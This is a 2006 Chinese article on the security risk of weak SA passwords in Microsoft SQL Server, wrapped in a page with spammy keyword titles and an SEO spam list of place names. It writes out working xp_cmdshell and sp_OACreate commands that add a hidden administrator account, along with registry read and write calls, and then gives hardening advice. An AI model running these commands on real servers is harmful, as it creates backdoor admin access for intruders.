国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

SA弱口令帶來的安全隱患
2006-03-27   http://www.51cto.com

存在Microsoft SQL Server SA弱口令漏洞的計算機一直是網絡攻擊者青睞的對象之一,通過這個漏洞,可以輕易的得到服務器的管理權限,從而威脅網絡及數據的安全。作為網絡管理員,我們可不能不聞不問,一定要弄清楚這其中的起因、經過和結果,才能有的放矢,做到更為有效的防范,下面我就詳細的向大家介紹一下。

Microsoft SQLServer是一個c/s模式的強大的關系型數據庫管理系統,應用領域十分廣泛,從網站后臺數據庫到一些MIS(管理信息系統)到處都可以看到它的身影。網絡中利用Microsoft SQLServer SA弱口令入侵的核心內容就是利用Microsoft SQLServer中的存儲過程獲得系統管理員權限,那到底什么是存儲過程?

存儲過程是存儲在SQLServer中的預先寫好的SQL語句集合,其中危險性最高的擴展存儲過程就是xp_cmdshell了,它可以執行操作系統的任何指令,而SA是Microsoft SQLServer的管理員帳號,擁有最高權限,它可以執行擴展存儲過程,并獲得返回值,比如執行:exec master..xp_cmdshell 'net user test 1234 /add'和exec master..xp_cmdshell 'net localgroup administrators test /add'這樣對方的系統就被添加了一個用戶名為test,密碼為1234,有管理員權限的用戶,如圖一所示。

""

圖一(點擊看原圖

現在你應該明白為什么得到SA密碼,就可以得到系統的最高權限了吧。而往往不少網絡管理員不清楚這個情況,為自己的SA用戶起了一些諸如1234,4321等簡單的密碼,甚至根本就不設置密碼,這樣網絡入侵者就可以利用一些黑客工具很輕松的掃描到SA的密碼,進而控制計算機。

除了xp_cmdshell,還有一些存儲過程也有可能會被入侵者利用到:

1、xp_regread(這個擴展存儲過程可以讀取注冊表指定的鍵里指定的值),使用方法(得到機器名):

DECLARE @test varchar(50)

EXEC master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',

@key='systemcontrolset001controlcomputernamecomputername',

@value_name='computername',

@value=@test OUTPUT

SELECT @test

2、xp_regwrite(這個擴展存儲過程可以寫入注冊表指定的鍵里指定的值),使用方法(在鍵HKEY_LOCAL_MACHINESOFTWAREaaaaaaValue寫入bbb):

EXEC master..xp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWAREaaa',

@value_name='aaaValue',

@type='REG_SZ',

@value='bbb'

如果被入侵的計算機的administrator用戶可以瀏覽注冊表中的HKEY_LOCAL_MACHINESAMSAM信息,那使用xp_regread、xp_regwrite這兩個存儲過程可以實現克隆administrator用戶,得到管理員權限。xp_regdeletekey、xp_regdeletevalue也會對系統帶來安全隱患。

3、OLE相關的一系列存儲過程,這系列的存儲過程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,使用方法:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',

@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,

'c:WINNTsystem32cmd.exe /c net user test 1234 /add'--

這樣對方系統增加了一個用戶名為test,密碼為1234的用戶,再執行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',

@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,

'c:WINNTsystem32cmd.exe

/c net localgroup administrators test /add '--

用戶test,被加入管理員組。

解決辦法:給SA起個足夠復雜的密碼,使網絡攻擊者很難破解出來。為了保險,我們還要到在SQLServer的查詢分析器中使用存儲過程sp_dropextendedproc刪除xp_cmdshell等存儲過程,需要時再使用sp_addextendedproc恢復即可,具體操作可以在SQLServer中查詢sp_dropextendedproc和sp_addextendedproc的使用幫助,需要注意一點的是刪除OLE相關系列的存儲過程,可能會造成企業管理器中的某些功能無法使用,這里筆者不建議刪除。

既然我們知道了SP_OACREATE的使用方法,那我們就可以到WINNTsystem32下找到cmd.exe,net.exe和net1.exe這三個文件,在“屬性”—“安全”中把可以對他們訪問的用戶全部刪除掉,這樣就無法使用SP_OACREATE來增加系統用戶了,在我們需要訪問這些文件的時候再加上訪問用戶就可以了。

熱詞搜索:

上一篇:一盤在手 救災無憂
下一篇:黑客工具展覽會:DoS攻擊軟件連連看

分享到: 收藏
主站蜘蛛池模板: 江孜县| 当雄县| 通州区| 新竹县| 金塔县| 塔河县| 泗水县| 微山县| 洪泽县| 潜山县| 兴化市| 故城县| 清丰县| 徐闻县| 乃东县| 京山县| 怀来县| 花莲市| 凭祥市| 汉沽区| 宁远县| 鞍山市| 三穗县| 朔州市| 龙川县| 丰台区| 铁岭县| 潞城市| 邯郸市| 承德市| 中宁县| 贞丰县| 石泉县| 蒙阴县| 许昌县| 平山县| 张家港市| 乃东县| 诏安县| 长垣县| 盐亭县|